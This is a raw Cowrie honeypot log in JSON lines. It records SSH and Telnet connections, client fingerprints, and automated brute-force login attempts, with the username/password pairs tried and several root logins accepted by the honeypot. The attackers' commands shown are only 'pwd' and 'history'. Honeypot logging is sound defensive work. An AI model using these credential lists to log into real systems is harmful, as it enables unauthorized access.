{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40344,"dst_ip":"1.2.3.4","dst_port":23,"session":"43a58e806c98","protocol":"telnet","message":"New connection: 212.227.125.160:40344 (1.2.3.4:23) [session: 43a58e806c98]","sensor":"my-vps","timestamp":"2025-08-28T20:34:18.230227Z"}
{"eventid":"cowrie.session.closed","duration":13.70719599723816,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:31.937347Z","src_ip":"212.227.125.160","session":"43a58e806c98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35718,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4b78e624a19","protocol":"ssh","message":"New connection: 212.227.125.160:35718 (1.2.3.4:22) [session: e4b78e624a19]","sensor":"my-vps","timestamp":"2025-08-28T20:34:38.592918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:34:40.247508Z","src_ip":"212.227.125.160","session":"e4b78e624a19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:34:40.248441Z","src_ip":"212.227.125.160","session":"e4b78e624a19"}
{"eventid":"cowrie.login.success","username":"root","password":"suporte","message":"login attempt [root/suporte] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:34:46.585793Z","src_ip":"212.227.125.160","session":"e4b78e624a19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:34:50.073844Z","src_ip":"212.227.125.160","session":"e4b78e624a19"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T20:34:50.074586Z","src_ip":"212.227.125.160","session":"e4b78e624a19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:51.312013Z","src_ip":"212.227.125.160","session":"e4b78e624a19"}
{"eventid":"cowrie.session.closed","duration":"12.7","message":"Connection lost after 12.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:51.313264Z","src_ip":"212.227.125.160","session":"e4b78e624a19"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":39486,"dst_ip":"1.2.3.4","dst_port":22,"session":"99760e565427","protocol":"ssh","message":"New connection: 201.148.180.50:39486 (1.2.3.4:22) [session: 99760e565427]","sensor":"my-vps","timestamp":"2025-08-28T20:34:56.095320Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:57.870793Z","src_ip":"201.148.180.50","session":"99760e565427"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51956,"dst_ip":"1.2.3.4","dst_port":22,"session":"adb6425d6d82","protocol":"ssh","message":"New connection: 217.72.205.35:51956 (1.2.3.4:22) [session: adb6425d6d82]","sensor":"my-vps","timestamp":"2025-08-28T20:35:28.444057Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:35:28.445199Z","src_ip":"217.72.205.35","session":"adb6425d6d82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64554,"dst_ip":"1.2.3.4","dst_port":22,"session":"dde08158384c","protocol":"ssh","message":"New connection: 212.227.235.229:64554 (1.2.3.4:22) [session: dde08158384c]","sensor":"my-vps","timestamp":"2025-08-28T20:35:28.479698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:35:28.480359Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:35:28.608295Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"tomas","message":"login attempt [tomas/tomas] failed","sensor":"my-vps","timestamp":"2025-08-28T20:35:29.209703Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abc123","message":"login attempt [tomas/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:35:30.340161Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abcd123","message":"login attempt [tomas/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:35:31.470062Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abcd1234","message":"login attempt [tomas/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:35:32.600592Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abc1234","message":"login attempt [tomas/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:35:33.730654Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:35:34.862233Z","src_ip":"212.227.235.229","session":"dde08158384c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57633,"dst_ip":"1.2.3.4","dst_port":22,"session":"29535e9e640f","protocol":"ssh","message":"New connection: 212.227.235.229:57633 (1.2.3.4:22) [session: 29535e9e640f]","sensor":"my-vps","timestamp":"2025-08-28T20:38:08.505876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:38:08.507089Z","src_ip":"212.227.235.229","session":"29535e9e640f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:38:08.777192Z","src_ip":"212.227.235.229","session":"29535e9e640f"}
{"eventid":"cowrie.login.success","username":"root","password":"1029384756","message":"login attempt [root/1029384756] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:38:09.588542Z","src_ip":"212.227.235.229","session":"29535e9e640f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:38:10.145451Z","src_ip":"212.227.235.229","session":"29535e9e640f"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T20:38:10.146300Z","src_ip":"212.227.235.229","session":"29535e9e640f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:38:10.417722Z","src_ip":"212.227.235.229","session":"29535e9e640f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:38:10.419052Z","src_ip":"212.227.235.229","session":"29535e9e640f"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":12093,"dst_ip":"1.2.3.4","dst_port":22,"session":"9393715ae5bb","protocol":"ssh","message":"New connection: 80.94.95.15:12093 (1.2.3.4:22) [session: 9393715ae5bb]","sensor":"my-vps","timestamp":"2025-08-28T20:38:26.188478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:38:26.189199Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:38:26.256005Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden","message":"login attempt [jayden/jayden] failed","sensor":"my-vps","timestamp":"2025-08-28T20:38:26.632119Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden1","message":"login attempt [jayden/jayden1] failed","sensor":"my-vps","timestamp":"2025-08-28T20:38:27.701994Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden123","message":"login attempt [jayden/jayden123] failed","sensor":"my-vps","timestamp":"2025-08-28T20:38:28.771388Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden1234","message":"login attempt [jayden/jayden1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:38:29.841036Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.login.failed","username":"jayden","password":"jayden12345","message":"login attempt [jayden/jayden12345] failed","sensor":"my-vps","timestamp":"2025-08-28T20:38:30.916425Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:38:31.985161Z","src_ip":"80.94.95.15","session":"9393715ae5bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10753,"dst_ip":"1.2.3.4","dst_port":22,"session":"11d9e714f2b7","protocol":"ssh","message":"New connection: 212.227.235.229:10753 (1.2.3.4:22) [session: 11d9e714f2b7]","sensor":"my-vps","timestamp":"2025-08-28T20:38:44.239861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:38:44.241068Z","src_ip":"212.227.235.229","session":"11d9e714f2b7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:38:44.821509Z","src_ip":"212.227.235.229","session":"11d9e714f2b7"}
{"eventid":"cowrie.login.failed","username":"noel","password":"noel1234","message":"login attempt [noel/noel1234] failed","sensor":"my-vps","timestamp":"2025-08-28T20:38:45.417613Z","src_ip":"212.227.235.229","session":"11d9e714f2b7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:38:46.545238Z","src_ip":"212.227.235.229","session":"11d9e714f2b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"83b44969065f","protocol":"ssh","message":"New connection: 212.227.235.229:6102 (1.2.3.4:22) [session: 83b44969065f]","sensor":"my-vps","timestamp":"2025-08-28T20:39:34.880664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T20:39:35.266091Z","src_ip":"212.227.235.229","session":"83b44969065f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T20:39:35.638477Z","src_ip":"212.227.235.229","session":"83b44969065f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T20:39:36.013267Z","src_ip":"212.227.235.229","session":"83b44969065f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:39:36.015947Z","src_ip":"212.227.235.229","session":"83b44969065f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33156,"dst_ip":"1.2.3.4","dst_port":22,"session":"34e9657b34c4","protocol":"ssh","message":"New connection: 212.227.125.160:33156 (1.2.3.4:22) [session: 34e9657b34c4]","sensor":"my-vps","timestamp":"2025-08-28T20:41:01.599408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:41:03.095159Z","src_ip":"212.227.125.160","session":"34e9657b34c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:41:03.096443Z","src_ip":"212.227.125.160","session":"34e9657b34c4"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:41:07.990345Z","src_ip":"212.227.125.160","session":"34e9657b34c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:41:11.995972Z","src_ip":"212.227.125.160","session":"34e9657b34c4"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T20:41:11.996717Z","src_ip":"212.227.125.160","session":"34e9657b34c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11644,"dst_ip":"1.2.3.4","dst_port":22,"session":"787c949989d9","protocol":"ssh","message":"New connection: 212.227.125.160:11644 (1.2.3.4:22) [session: 787c949989d9]","sensor":"my-vps","timestamp":"2025-08-28T20:41:12.221998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:41:12.224845Z","src_ip":"212.227.125.160","session":"787c949989d9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:41:12.283094Z","src_ip":"212.227.125.160","session":"787c949989d9"}
